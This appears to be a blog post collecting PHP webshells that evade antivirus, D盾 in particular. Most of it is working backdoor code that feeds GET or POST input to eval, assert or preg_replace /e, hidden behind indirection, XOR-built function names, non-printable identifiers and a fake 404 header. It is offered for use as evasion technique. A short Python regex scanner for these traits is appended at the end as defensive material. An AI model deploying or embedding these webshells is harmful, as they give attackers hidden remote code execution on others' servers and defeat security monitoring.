PHP Webshell Bypass


I plan to keep this as a long-running, regularly updated summary of webshells that evade antivirus detection.

2019-10-12

Bypass with a single symbol

https://forum.90sec.com/t/topic/513/1

<?php
function test($name){#
    eval($name);
}

test($_GET['code']);
?>

2019-08-15

https://evi1.cn/post/bypass-shell/

<?php
$a = $_POST['cmd'];
$var = "phpnb {${eval($a)}}";

2019-08-12


2019-08-09

Aggressive detection evasion


2019-08-07

<?php
function a()
{
    return '' + @$_POST['a'];
}

eval(a());

Another one, using a ternary expression


2019-08-06

Using a constant to get past D盾 (D-Shield)

https://secquan.org/Notes/1069997

<?php
sprintf("123");
sprintf("123");
sprintf("123");
$a=$_GET['a'];
define("Test", "$a",true);
assert(TesT);
?>

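Another approach: get past D盾 through deserialization; write the code yourself.

Yet another approach: create an object and define its member variables repeatedly to get past D盾.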

2019-05-30

Using non-printable ASCII characters as variable names to get past D盾

https://github.com/th1k404/unishell

http://ascii.911cha.com/

<?php
if($_GET['␄']){
    $␄=$_GET['␄'];
    @preg_replace("/abcde/e",$␄, "abcdefg");
}
?>

You can modify it yourself.

2019-05-21

https://github.com/yzddmr6/webshell-venom

Uses random XOR to evade D盾 indefinitely.

For the AntSword plugin version, see:

https://github.com/yzddmr6/as_webshell_venom

<?php
//code by Mr6
error_reporting(0);
function randomkeys($length)
{
    $pattern = '`[email protected]#$%^&*_/+?<>{}|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
    for($i=0;$i<$length;$i++)
    {
        $key[$i]= $pattern{mt_rand(0,strlen($pattern)-1)};    // generate a PHP random number
    }
    return $key;
}
function randname($length)
{
    $pattern = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    for($i=0;$i<$length;$i++)
    {
        @$key.= $pattern{mt_rand(0,strlen($pattern)-1)};    // generate a PHP random number
    }
    return $key;
}
$str=randomkeys(6);
$bname=randname(4);
$lname=strrev(strtolower($bname));
$str2="assert";
echo "<?php \n";
echo "header('HTTP/1.1 404');\n";
echo "class  ".$bname."{ public \$c='';\nfunction __destruct(){\n";
for ($i=0;$i<6;$i++)
{
    $name="_".$i;
    $str3[$i]=bin2hex($str[$i] ^$str2[$i]);
    echo "$"."$name=";
    echo "'".$str[$i]."'"."^"."\"\\x".$str3[$i]."\";\n";
}
$aa='$db=$_0.$_1.$_2.$_3.$_4.$_5;';
echo $aa;
echo "\n";
echo '@$db ("$this->c");}}';
echo "\n";
echo "\${$lname}=new {$bname}();\n";
echo "@\${$lname}->c=\$_POST['Mr6'];\n";
echo "?>\n";
@$file=$_GET['file'];
$html = ob_get_contents();
if (isset($file)){
if(file_put_contents($file,$html))
echo "\n\n\n".$file."   save success!";}
else {echo "Please input the file name like '?file=xxx.txt'";}
?>

2019-05-11

<?php
function a(){
    return $a=$_POST['1'];
}
@assert(a());
?>

<?php
$value=$key = "a";
foreach($_POST as $key=>$value){
    assert($value);
}

The pattern that emerges is that when an already-defined variable has the same name as the loop variable, D盾 is much less sensitive.
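
On the detection side, the samples above all keep a small set of traits no matter how the request data is routed to the sink. The Python scanner below is an added example, not code from this post or from D盾; the rule names, `scan`, `verdict` and the sample strings are assumptions constructed for illustration.

```python
import re

# One heuristic per trait of the samples on this page. Rule names are this
# example's own and do not describe how D盾 works internally.
RULES = {
    # eval()/assert() run a string as PHP code
    "code-exec-sink": re.compile(r"\b(?:eval|assert)\s*\(", re.I),
    # the /e modifier makes preg_replace() evaluate the replacement
    "preg-replace-e": re.compile(r"preg_replace\s*\(\s*([\"'])/.*?/\w*e\w*\1", re.I),
    # "{${ f(...) }}" calls a function from inside a double-quoted string
    "call-in-interpolation": re.compile(r"\{\$\{\s*\w+\s*\("),
    # define(..., true) makes the constant name case-insensitive
    "case-insensitive-define": re.compile(r"\bdefine\s*\([^;]*,\s*true\s*\)", re.I),
    # 'c' ^ "\xNN" builds one character of a hidden name at run time
    "xor-built-char": re.compile(r"'[^']'\s*\^\s*\"\\x[0-9a-f]{2}\"", re.I),
    # $name(...) calls whatever function the variable names
    "variable-function-call": re.compile(r"\$\w+\s*\("),
    # "$" followed by a control or non-ASCII character
    "odd-identifier": re.compile(r"\$[^\x20-\x7e\s]"),
}
REQUEST_DATA = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")


def scan(source):
    """Return the sorted names of the rules that match a PHP source string."""
    return sorted(name for name, rx in RULES.items() if rx.search(source))


def verdict(source):
    """Flag a file when request data and any trait co-occur anywhere in it.

    Matching per file rather than per statement ignores the indirection
    (function return, constant, loop variable) placed between source and sink.
    """
    return "suspicious" if scan(source) and REQUEST_DATA.search(source) else "clean"


# Constructed inputs: fragments shaped like the samples above, plus a benign file.
SAMPLES = {
    "wrapped-eval": "<?php function a(){ return $_POST['a']; } eval(a());",
    "constant": "<?php $a=$_GET['a']; define(\"Test\", \"$a\", true); assert(TesT);",
    "benign": "<?php $name = htmlspecialchars($_GET['name']); echo strlen($name);",
}

if __name__ == "__main__":
    for label, src in SAMPLES.items():
        print(f"{label}: {verdict(src)} {scan(src)}")
```

These are regex heuristics over source text, so legitimate code that uses variable functions or non-ASCII identifiers will also match; treat a hit as a reason for manual review of the file.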